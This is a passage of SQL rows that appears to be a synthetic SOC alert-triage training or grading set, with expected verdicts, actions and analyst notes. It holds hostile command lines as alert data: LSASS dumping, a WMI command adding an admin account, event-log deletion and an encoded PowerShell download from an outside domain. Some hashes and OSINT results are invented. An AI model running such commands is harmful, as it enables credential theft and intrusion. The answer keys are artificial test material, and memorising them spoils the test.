(2148, 'Fileless Malware Detected via PowerShell Script Execution', 'critical', 'CrowdStrike', 'A PowerShell script executed a fileless malware payload targeting LSASS for credential dumping. The attack originated from an external IP using a sophisticated obfuscation technique.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:30:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"hostname\":\"CORP-WORKSTATION-17\",\"command_line\":\"powershell -nop -w hidden -enc aQBmACgAIAAoACQAbgB1AGwAbAAgACkAIHsAIAAkAG4AdQBsAGwAIA0K\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1523 times for malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -nop -w hidden -enc aQBmACgAIAAoACQAbgB1AGwAbAAgACkAIHsAIAAkAG4AdQBsAGwAIA0K\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected obfuscated PowerShell command typical of fileless malware\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of obfuscated PowerShell commands and targeting LSASS for credential dumping confirms this as a true positive.\"}', 'Expert', 'EDR', 9, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2149, 'Credential Dumping via LSASS Memory Access', 'high', 'Carbon Black', 'A process was detected accessing LSASS memory, typical of credential dumping attempts. The attacker used process hollowing techniques to evade detection.', 'Credential Attack', 'T1003.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:47:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.89\",\"dst_ip\":\"10.0.0.45\",\"username\":\"admin\",\"hostname\":\"CORP-SERVER-02\",\"command_line\":\"rundll32.exe C:\\\\Windows\\\\System32\\\\comsvcs.dll, MiniDump 1234 C:\\\\Temp\\\\lsass.dmp\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with credential theft campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"rundll32.exe C:\\\\Windows\\\\System32\\\\comsvcs.dll, MiniDump 1234 C:\\\\Temp\\\\lsass.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command line indicates LSASS memory dumping\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The access to LSASS memory using process hollowing techniques signifies a true positive for credential dumping.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, NULL, 0),
(2150, 'Lateral Movement Detected via WMI Execution', 'critical', 'SentinelOne', 'An attacker used WMI to execute a remote command on a critical server, indicating lateral movement within the network. The attack involved DGA domains and fast-flux DNS.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:22:39Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.45\",\"dst_ip\":\"192.168.2.30\",\"username\":\"svc_account\",\"hostname\":\"CORP-DBSERVER-04\",\"command_line\":\"wmic /node:192.168.2.30 process call create \\\"cmd.exe /c net user hacker P@ssw0rd /add\\\"\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP noted for involvement in lateral movement attacks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic /node:192.168.2.30 process call create \\\"cmd.exe /c net user hacker P@ssw0rd /add\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"WMI command execution indicative of lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.2.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of WMI for remote command execution on an internal server confirms this as a lateral movement attempt.\"}', 'Expert', 'EDR', 9, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2151, 'Suspicious Network Activity with Fast-Flux DNS and DGA Domains', 'high', 'Sysmon', 'Detected network connections to domains generated by a Domain Generation Algorithm (DGA) with fast-flux DNS techniques. This is indicative of a potential botnet C2 activity.', 'Data Exfiltration', 'T1071.004', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:22Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.40\",\"dst_ip\":\"203.0.113.123\",\"username\":\"bsmith\",\"hostname\":\"CORP-LAPTOP-29\",\"domain\":\"abcd1234.xyz\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP associated with fast-flux DNS and botnet C2 servers\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"abcd1234.xyz\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain generated by DGA, typical of botnet communications\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.3.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The presence of DGA and fast-flux DNS patterns suggests an ongoing data exfiltration attempt via a botnet.\"}', 'Expert', 'EDR', 9, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2152, 'Defensive Evasion Detected: Timestomping and Log Deletion', 'high', 'Carbon Black', 'Detected execution of a script performing timestomping and log deletion on critical systems, aimed at evading detection and obscuring attack traces.', 'Defensive Evasion', 'T1070.006', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:34:56Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.4.50\",\"dst_ip\":\"192.168.4.50\",\"username\":\"sysadmin\",\"hostname\":\"CORP-FILESERVER-01\",\"command_line\":\"cmd.exe /c del /f /q C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\* & copy /b +,,\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"cmd.exe /c del /f /q C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\* & copy /b +,,\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicative of log deletion and timestomping activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.4.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"defensive_evasion\",\"analysis_notes\":\"The use of commands to delete logs and modify timestamps is a clear indicator of defensive evasion tactics.\"}', 'Expert', 'EDR', 9, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2153, 'Fileless Malware Detected via PowerShell', 'critical', 'CrowdStrike', 'A sophisticated fileless malware attack was detected using obfuscated PowerShell scripts to execute payloads directly in memory. The attack involved credential dumping from LSASS.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.15\",\"username\":\"jdoe\",\"hostname\":\"CORP-DC1\",\"command_line\":\"powershell -nop -w hidden -e Y2FsY3VsYXRlLWNoZWNrc3Vt\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -nop -w hidden -e Y2FsY3VsYXRlLWNoZWNrc3Vt\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Obfuscated PowerShell command used in fileless malware attacks\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious hash associated with credential dumping tools\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"This alert is a true positive due to the presence of obfuscated PowerShell commands and a known malicious hash used in credential dumping.\"}', 'Expert', 'EDR', 9, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2154, 'Lateral Movement Detected via WMI', 'high', 'SentinelOne', 'An attacker attempted lateral movement within the network using WMI. The activity was observed moving from a compromised host to a domain controller.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:56:32Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"192.168.1.20\",\"username\":\"hacker\",\"hostname\":\"COMPROMISED-PC\",\"command_line\":\"wmic /node:192.168.1.20 process call create calc.exe\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic /node:192.168.1.20 process call create calc.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"WMI command execution indicative of lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"WMI commands originating from a compromised host attempting to execute processes on a domain controller indicate a true positive for lateral movement.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, NULL, 0),
(2155, 'Credential Dumping from LSASS Detected', 'critical', 'Carbon Black', 'An attacker executed a memory scraping tool to extract credentials from the LSASS process on a critical server.', 'Credential Access', 'T1003.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:22Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"192.168.2.10\",\"username\":\"admin\",\"hostname\":\"SERVER01\",\"command_line\":\"procdump64.exe -ma lsass.exe C:\\\\Windows\\\\Temp\\\\lsass.dmp\",\"file_hash\":\"6f5902ac237024bdd0c176cb93063dc4\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with credential dumping activity\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"procdump64.exe -ma lsass.exe C:\\\\Windows\\\\Temp\\\\lsass.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known memory dumping tool used to extract credentials from LSASS\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"6f5902ac237024bdd0c176cb93063dc4\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Malicious hash associated with credential theft tools\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The execution of a known memory dumping tool against the LSASS process on a server indicates a true positive for credential theft.\"}', 'Expert', 'EDR', 9, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2156, 'Multi-Hop C2 Communication via Slack', 'high', 'Sysmon', 'Detected multi-hop command and control communication using Slack channels. This technique leveraged legitimate services to evade detection.', 'Command and Control', 'T1102', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"198.51.100.3\",\"dst_ip\":\"10.0.0.5\",\"username\":\"malicious_user\",\"hostname\":\"INFECTED-HOST\",\"request_body\":\"POST /api/chat.postMessage HTTP/1.1\",\"domain\":\"slack.com\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.3\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in suspicious C2 activities\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"slack.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate domain used for C2 communications\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"POST /api/chat.postMessage HTTP/1.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual Slack API usage for C2 communications\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"command_and_control\",\"analysis_notes\":\"The use of legitimate services such as Slack for C2 communications indicates a true positive, highlighting the need for enhanced monitoring.\"}', 'Expert', 'EDR', 9, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2157, 'Fast-Flux DNS with DGA Domain Detected', 'high', 'CrowdStrike', 'A fast-flux DNS network using a domain generated by a DGA was detected, indicating potential botnet activity.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T18:30:10Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.62\",\"dst_ip\":\"172.16.0.2\",\"username\":\"bot\",\"hostname\":\"CLIENT-PC\",\"domain\":\"xj3k2l5o2d3a.com\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.62\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP frequently reported for hosting C2 infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"xj3k2l5o2d3a.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain generated using DGA, part of a known fast-flux network\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The detection of a fast-flux DNS network using a DGA domain suggests botnet activity and warrants immediate investigation.\"}', 'Expert', 'EDR', 9, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2158, 'Fileless Malware Execution via PowerShell Detected', 'critical', 'CrowdStrike', 'A sophisticated fileless malware attack was detected involving PowerShell and credential dumping from LSASS. Lateral movement was attempted via WMI.', 'Malware', 'T1086', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:22:35Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"203.0.113.89\",\"username\":\"jdoe\",\"hostname\":\"CORP-DC01\",\"command_line\":\"powershell.exe -nop -w hidden -enc WwBTAHkAcwB0AGUAbQAuAE4AZQBUAC4AVwBlAGIAQwBsAGkAZQBuAHQAXQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhAEMAbwBuAHQAZQBuAHQAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQBhAG4AZABhAG4AdABpAC4AYwBvAG0AIgApAA==\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address used by compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 152 times for hosting C2 servers\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -enc WwBTAHkAcwB0AGUAbQAuAE4AZQBUAC4AVwBlAGIAQwBsAGkAZQBuAHQAXQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhAEMAbwBuAHQAZQBuAHQAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQBhAG4AZABhAG4AdABpAC4AYwBvAG0AIgApAA==\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of fileless malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"This alert is confirmed as true positive due to the presence of encoded PowerShell activity and communication with a known malicious IP.\"}', 'Expert', 'EDR', 9, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2159, 'Suspicious Network Activity Detected', 'high', 'Sysmon', 'Anomalous network connection identified from an internal system to an external IP.', 'Network Anomaly', 'T1049', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:47:22Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"203.0.113.100\",\"username\":\"mjackson\",\"hostname\":\"WORKSTATION-12\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address used by employee workstation\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 10 times for unusual activities\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"The alert was determined to be a false positive due to the lack of malicious intent in the network connection.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, NULL, 0),
(2160, 'Potential Brute Force Attack Detected', 'medium', 'SentinelOne', 'Multiple failed login attempts observed from an external IP, potentially indicating a brute force attack.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:47Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.75\",\"username\":\"admin\",\"hostname\":\"CORP-SERVER01\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 25 times for failed login attempts\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"brute_force\",\"analysis_notes\":\"The alert is likely a false positive as the IP has a history of failed logins but no successful breaches recorded.\"}', 'Expert', 'EDR', 9, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2161, 'Unusual Email Activity Detected', 'medium', 'Carbon Black', 'A suspicious email with a potential phishing URL was detected, but no malicious content was found upon further inspection.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:32:10Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.56\",\"username\":\"rsmith\",\"hostname\":\"MAIL-SERVER01\",\"email_sender\":\"noreply@safe-email.com\",\"url\":\"http://safesite.com/login\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious activity associated with this IP\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://safesite.com/login\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL is legitimate and safe\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email was sent from a legitimate domain with a clean URL, indicating a false positive.\"}', 'Expert', 'EDR', 9, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2162, 'Suspicious Web Request Detected - Potential XSS', 'high', 'CrowdStrike', 'A web request containing potential XSS payload was detected but was deemed non-malicious after analysis.', 'Web Attack', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:55:30Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.120\",\"dst_ip\":\"192.168.1.100\",\"username\":\"webuser\",\"hostname\":\"WEB-SERVER01\",\"request_body\":\"<script>alert(\'test\')</script>\"}', '2026-03-16 03:21:51', '2026-03-16 03:21:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.120\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP flagged for suspicious web requests\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"<script>alert(\'test\')</script>\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Common test payload for XSS\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The detected XSS payload was a benign test string, confirming a false positive.\"}', 'Expert', 'EDR', 9, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2163, 'Packed Executable Detected with Suspicious Network Activity', 'high', 'Any.Run', 'A packed executable was detected attempting to connect to a known malicious IP address, indicative of C2 activity. Reverse engineering of the sample revealed suspicious strings.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:34:56Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"198.51.100.23\",\"username\":\"jdoe\",\"hostname\":\"workstation-1\",\"command_line\":\"C:\\\\temp\\\\malware.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware family\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a packed executable connecting to a known malicious IP confirms malicious activity.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2164, 'Suspicious Macro Detected in Email Attachment', 'critical', 'Cuckoo Sandbox', 'An email attachment with a malicious macro was executed, leading to the download of a secondary payload from a suspected phishing domain.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:20:15Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.5\",\"dst_ip\":\"192.168.1.15\",\"username\":\"susan.smith\",\"hostname\":\"office-pc\",\"email_sender\":\"malicious@example.com\",\"url\":\"http://malicious-download.com/payload.exe\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for distributing malware\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-download.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing campaigns\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of a malicious macro leading to a known phishing site confirms the malicious intent.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2165, 'Potential Malicious Macro Execution Detected', 'medium', 'Ghidra', 'A macro from a document appeared suspicious but analysis revealed it was a standard template used internally, falsely triggering the alert.', 'Malware', 'T1203', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:45:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"192.168.1.21\",\"username\":\"alice\",\"hostname\":\"alice-pc\",\"command_line\":\"C:\\\\Users\\\\alice\\\\Documents\\\\template_macro.docm\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"C:\\\\Users\\\\alice\\\\Documents\\\\template_macro.docm\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"File matches known safe internal templates\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro was part of a recognized internal document, leading to a false positive.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2166, 'Encoded Command Execution Detected', 'medium', 'IDA Pro', 'A Base64 encoded command was executed on a server, but further analysis showed it was a legitimate maintenance script.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:10:20Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"192.168.1.31\",\"username\":\"admin\",\"hostname\":\"server-01\",\"command_line\":\"powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0AYwBvAG0AbQBhAG4AZAAgACIAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACIA\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0AYwBvAG0AbQBhAG4AZAAgACIAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACIA\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command matches known maintenance procedure\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded command was part of a scheduled maintenance task, resulting in a false positive.\"}', 'Intermediate', 'MAL', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
